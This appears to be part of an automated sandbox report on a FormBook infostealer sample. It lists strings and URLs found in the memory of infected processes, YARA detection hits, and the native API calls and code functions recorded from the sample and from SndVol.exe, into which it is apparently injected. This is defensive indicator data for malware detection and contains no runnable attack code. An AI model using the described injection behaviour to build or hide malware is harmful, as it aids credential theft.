                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yumizhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yushenzhibo.com
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yutongzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ziah.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zootech.net
                Source: SndVol.exe, 00000010.00000003.1586108305.0000000008568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://beian.miit.gov.cn/#/Integrated/index
                Source: SndVol.exe, 00000010.00000003.1586108305.0000000008568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: SndVol.exe, 00000010.00000003.1586108305.0000000008568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: SndVol.exe, 00000010.00000003.1586108305.0000000008568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: SndVol.exe, 00000010.00000003.1586108305.0000000008568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: SndVol.exe, 00000010.00000003.1586108305.0000000008568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: SndVol.exe, 00000010.00000003.1586108305.0000000008568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
                Source: svchost.exe, 00000007.00000003.1204737878.0000023C0CE60000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
                Source: SndVol.exe, 00000010.00000003.1586108305.0000000008568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://img.ucdl.pp.uc.cn/upload_files/wdj_web/public/img/favicon.ico
                Source: SndVol.exe, 00000010.00000003.1577558958.0000000003575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: SndVol.exe, 00000010.00000002.3510287029.000000000356E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: SndVol.exe, 00000010.00000003.1577558958.0000000003575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2FF
                Source: SndVol.exe, 00000010.00000002.3510287029.0000000003549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=10333
                Source: SndVol.exe, 00000010.00000002.3510287029.0000000003549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: SndVol.exe, 00000010.00000002.3510287029.0000000003549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: SndVol.exe, 00000010.00000003.1576529746.00000000084A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://push.zhanzhang.baidu.com/push.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://ucan.25pp.com/Wandoujia_wandoujia_qrbinded.apk
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://white.anva.org.cn/
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.12377.cn/
                Source: SndVol.exe, 00000010.00000003.1586108305.0000000008568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: SndVol.exe, 00000010.00000003.1586108305.0000000008568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://zzlz.gsxt.gov.cn/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.ungziped_file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ungziped_file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.3512102451.0000000005040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.3514314819.00000000052F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1396809453.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1393148021.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3509810870.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3512178205.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1400004101.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3512080555.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0042CC83 NtClose,5_2_0042CC83
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222B60 NtClose,LdrInitializeThunk,5_2_01222B60
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01222DF0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01222C70
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012235C0 NtCreateMutant,LdrInitializeThunk,5_2_012235C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01224340 NtSetContextThread,5_2_01224340
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01224650 NtSuspendThread,5_2_01224650
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222BA0 NtEnumerateValueKey,5_2_01222BA0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222B80 NtQueryInformationFile,5_2_01222B80
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222BE0 NtQueryValueKey,5_2_01222BE0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222BF0 NtAllocateVirtualMemory,5_2_01222BF0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222AB0 NtWaitForSingleObject,5_2_01222AB0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222AF0 NtWriteFile,5_2_01222AF0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222AD0 NtReadFile,5_2_01222AD0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222D30 NtUnmapViewOfSection,5_2_01222D30
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222D00 NtSetInformationFile,5_2_01222D00
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222D10 NtMapViewOfSection,5_2_01222D10
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222DB0 NtEnumerateKey,5_2_01222DB0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222DD0 NtDelayExecution,5_2_01222DD0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222C00 NtQueryInformationProcess,5_2_01222C00
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222C60 NtCreateKey,5_2_01222C60
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222CA0 NtQueryInformationToken,5_2_01222CA0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222CF0 NtOpenProcess,5_2_01222CF0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222CC0 NtQueryVirtualMemory,5_2_01222CC0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222F30 NtCreateSection,5_2_01222F30
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222F60 NtCreateProcessEx,5_2_01222F60
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222FA0 NtQuerySection,5_2_01222FA0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222FB0 NtResumeThread,5_2_01222FB0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222F90 NtProtectVirtualMemory,5_2_01222F90
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222FE0 NtCreateFile,5_2_01222FE0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222E30 NtWriteVirtualMemory,5_2_01222E30
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222EA0 NtAdjustPrivilegesToken,5_2_01222EA0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222E80 NtReadVirtualMemory,5_2_01222E80
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222EE0 NtQueueApcThread,5_2_01222EE0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01223010 NtOpenDirectoryObject,5_2_01223010
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01223090 NtSetValueKey,5_2_01223090
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012239B0 NtGetContextThread,5_2_012239B0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01223D10 NtOpenProcessToken,5_2_01223D10
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01223D70 NtOpenThread,5_2_01223D70
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05274650 NtSuspendThread,LdrInitializeThunk,16_2_05274650
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05274340 NtSetContextThread,LdrInitializeThunk,16_2_05274340
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272D30 NtUnmapViewOfSection,LdrInitializeThunk,16_2_05272D30
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272D10 NtMapViewOfSection,LdrInitializeThunk,16_2_05272D10
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272DF0 NtQuerySystemInformation,LdrInitializeThunk,16_2_05272DF0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272DD0 NtDelayExecution,LdrInitializeThunk,16_2_05272DD0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272C60 NtCreateKey,LdrInitializeThunk,16_2_05272C60
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272C70 NtFreeVirtualMemory,LdrInitializeThunk,16_2_05272C70
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272CA0 NtQueryInformationToken,LdrInitializeThunk,16_2_05272CA0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272F30 NtCreateSection,LdrInitializeThunk,16_2_05272F30
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272FB0 NtResumeThread,LdrInitializeThunk,16_2_05272FB0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272FE0 NtCreateFile,LdrInitializeThunk,16_2_05272FE0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272E80 NtReadVirtualMemory,LdrInitializeThunk,16_2_05272E80
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272EE0 NtQueueApcThread,LdrInitializeThunk,16_2_05272EE0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272B60 NtClose,LdrInitializeThunk,16_2_05272B60
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272BA0 NtEnumerateValueKey,LdrInitializeThunk,16_2_05272BA0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272BE0 NtQueryValueKey,LdrInitializeThunk,16_2_05272BE0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272BF0 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_05272BF0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272AF0 NtWriteFile,LdrInitializeThunk,16_2_05272AF0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272AD0 NtReadFile,LdrInitializeThunk,16_2_05272AD0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052735C0 NtCreateMutant,LdrInitializeThunk,16_2_052735C0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052739B0 NtGetContextThread,LdrInitializeThunk,16_2_052739B0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272D00 NtSetInformationFile,16_2_05272D00
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272DB0 NtEnumerateKey,16_2_05272DB0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272C00 NtQueryInformationProcess,16_2_05272C00
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272CF0 NtOpenProcess,16_2_05272CF0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272CC0 NtQueryVirtualMemory,16_2_05272CC0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272F60 NtCreateProcessEx,16_2_05272F60
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272FA0 NtQuerySection,16_2_05272FA0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272F90 NtProtectVirtualMemory,16_2_05272F90
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272E30 NtWriteVirtualMemory,16_2_05272E30
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272EA0 NtAdjustPrivilegesToken,16_2_05272EA0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272B80 NtQueryInformationFile,16_2_05272B80
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05272AB0 NtWaitForSingleObject,16_2_05272AB0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05273010 NtOpenDirectoryObject,16_2_05273010
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05273090 NtSetValueKey,16_2_05273090
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05273D10 NtOpenProcessToken,16_2_05273D10
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05273D70 NtOpenThread,16_2_05273D70
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032C9330 NtCreateFile,16_2_032C9330
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032C97A0 NtAllocateVirtualMemory,16_2_032C97A0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032C9640 NtClose,16_2_032C9640
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032C95A0 NtDeleteFile,16_2_032C95A0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032C94A0 NtReadFile,16_2_032C94A0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0555F976 NtMapViewOfSection,16_2_0555F976
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 0_2_00EB3E400_2_00EB3E40
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 0_2_00EBD6FC0_2_00EBD6FC
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 0_2_02B66B780_2_02B66B78
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 0_2_02B601300_2_02B60130
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 0_2_02B601200_2_02B60120
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 0_2_02B66B680_2_02B66B68
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_00418C135_2_00418C13
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_004029805_2_00402980
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0042F2635_2_0042F263
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_004033C05_2_004033C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_004023FB5_2_004023FB
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0041047C5_2_0041047C
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_004024005_2_00402400
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_004104835_2_00410483
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_004025E45_2_004025E4
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_004025F05_2_004025F0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_00402E405_2_00402E40
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_00416E035_2_00416E03
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_00402E325_2_00402E32
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0040E6835_2_0040E683
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_004106A35_2_004106A3
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0040E7D35_2_0040E7D3
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E01005_2_011E0100
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0128A1185_2_0128A118
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012781585_2_01278158
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012B01AA5_2_012B01AA
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012A81CC5_2_012A81CC
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012820005_2_01282000
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012AA3525_2_012AA352
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012B03E65_2_012B03E6
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011FE3F05_2_011FE3F0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012902745_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012702C05_2_012702C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F05355_2_011F0535
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012B05915_2_012B0591
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012A24465_2_012A2446
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0129E4F65_2_0129E4F6
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F07705_2_011F0770
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012147505_2_01214750
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EC7C05_2_011EC7C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120C6E05_2_0120C6E0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012069625_2_01206962
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012BA9A65_2_012BA9A6
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F29A05_2_011F29A0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F28405_2_011F2840
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011FA8405_2_011FA840
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011D68B85_2_011D68B8
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E8F05_2_0121E8F0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012AAB405_2_012AAB40
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012A6BD75_2_012A6BD7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EEA805_2_011EEA80
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011FAD005_2_011FAD00
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01208DBF5_2_01208DBF
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EADE05_2_011EADE0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0C005_2_011F0C00
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290CB55_2_01290CB5
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E0CF25_2_011E0CF2
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01232F285_2_01232F28
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01210F305_2_01210F30
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01264F405_2_01264F40
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0126EFA05_2_0126EFA0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E2FC85_2_011E2FC8
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011FCFE05_2_011FCFE0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012AEE265_2_012AEE26
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0E595_2_011F0E59
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01202E905_2_01202E90
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012ACE935_2_012ACE93
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012AEEDB5_2_012AEEDB
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012BB16B5_2_012BB16B
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0122516C5_2_0122516C
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DF1725_2_011DF172
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011FB1B05_2_011FB1B0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012A70E95_2_012A70E9
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012AF0E05_2_012AF0E0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F70C05_2_011F70C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0129F0CC5_2_0129F0CC
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012A132D5_2_012A132D
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DD34C5_2_011DD34C
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0123739A5_2_0123739A
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F52A05_2_011F52A0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012912ED5_2_012912ED
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120B2C05_2_0120B2C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012A75715_2_012A7571
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0128D5B05_2_0128D5B0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012AF43F5_2_012AF43F
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E14605_2_011E1460
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012AF7B05_2_012AF7B0
